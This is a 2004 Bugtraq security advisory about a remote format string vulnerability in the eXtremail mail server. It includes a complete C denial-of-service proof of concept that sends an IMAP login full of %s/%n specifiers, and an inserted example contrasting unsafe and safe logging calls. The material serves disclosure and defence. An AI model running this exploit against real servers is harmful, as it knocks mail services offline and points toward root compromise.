Message-ID: <20040425144049.13763.qmail@www.securityfocus.com>
Date: 25 Apr 2004 14:40:49 -0000
From: Luca Ercoli <luca.e@...web.com>
To: bugtraq@...urityfocus.com
Subject: Remote Format String Vulnerabilities in eXtremail




Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String



What’s eXtremail:

eXtremail is a Unix mail server that supports the SMTP, POP3 and IMAP protocols.
It includes support for virtual domains, spoofing attack, SSL connection
and Antivirus checking.



Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail,
allowing remote attackers to gain root privileges.
This security flaw can be exploited by supplying a specially crafted string
containing format specifiers to various SMTP, POP and IMAP commands.
The vulnerability was reported to affect some previous versions
(BugTraq ID: 2908) and has been reintroduced in the latest version of eXtremail.


Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection            -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received



After a successful denial of service attack, eXtremail must be restarted
to regain its functionality (Smtpd, Pop3d, Imapd, Remt).
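The bug class described above, shown as an added example that is not part of the original advisory and is not eXtremail's code: a logging routine that receives client text as its format argument, next to the corrected call and a small input check. The function names, the log_write() helper and the sample login name are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical printf-style logging routine (eXtremail's source is not on
 * the page). Whatever arrives as fmt is parsed for conversion directives. */
static int log_write(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int written = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return written;
}

/* Vulnerable pattern: the message holding client text becomes the format,
 * so "%s" or "%n" in the login name consumes arguments that do not exist. */
int log_user_error_unsafe(char *out, size_t n, const char *user)
{
    char msg[512];
    snprintf(msg, sizeof msg, "IMAP - Error: User %s", user);
    return log_write(out, n, msg);
}

/* Hardened form: constant format, client text passed only as an argument. */
int log_user_error_safe(char *out, size_t n, const char *user)
{
    return log_write(out, n, "IMAP - Error: User %s", user);
}

/* Detection aid: count conversion directives in client input. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (; *s; s++)
        if (s[0] == '%' && s[1] != '\0') {
            if (s[1] == '%') s++;      /* "%%" is a literal percent sign */
            else count++;
        }
    return count;
}

int main(void)
{
    char line[256];
    log_user_error_safe(line, sizeof line, "%s%s%s%n"); /* constructed input */
    printf("%s (directives: %d)\n", line, count_format_directives("%s%s%s%n"));
    return 0;
}
```

Building with `-Wformat -Wformat-security`, and declaring logging wrappers with `__attribute__((format(printf, ...)))` so the compiler checks their callers too, flags the unsafe pattern at compile time.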






Proof of Concept:

------ eXtremail-kill.c --------


/**********************************************
*  Proof of Concept                           *
*  eXtremail 1.5.x Denial of Service	      *
*					      *
*  Luca Ercoli	<luca.e [at] seeweb.com>      *
*  Seeweb	   http://www.seeweb.com      *
*					      *
***********************************************/

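#include <stdio.h>
#include <stdlib.h>      /* exit */
#include <string.h>      /* memset, strlen */
#include <unistd.h>      /* close, sleep, fork */
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>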

#define PORT 143
#define MAXRECVSIZE 100


int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


int numbytes;



void crash(char *host,int TYPE)
{

 int sockfd;  
 char buf[MAXRECVSIZE];
 struct hostent *he;
 struct sockaddr_in their_addr; 
 char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL) 
     {  
      perror("gethostbyname");
      exit(1);
     }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
      perror("socket");
      exit(1);
     }

 their_addr.sin_family = AF_INET;   
 their_addr.sin_port = htons(PORT);  
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8); 

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
     {
      perror("connect");
      exit(1);
     }

   
  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
     {
      perror("recv");
      exit(1);
     }

 buf[numbytes] = '\0';

  if (TYPE == 0)
     {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
     }

 close(sockfd);

}



int main(int argc, char *argv[])
{
    
 printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
 printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2) 
   {	
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
   }
 
 crash(argv[1],0);
 numbytes=0;
 printf ("\n[+] Checking server status ...\n");


 if(!fork()) crash(argv[1],1);
 sleep(5);
 if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

 return 0;

 
}

-------------------------------



Solution:
No solution available at the moment.







Credits:

-- 
Luca Ercoli	<luca.e [at] seeweb.com>
Seeweb		http://www.seeweb.com

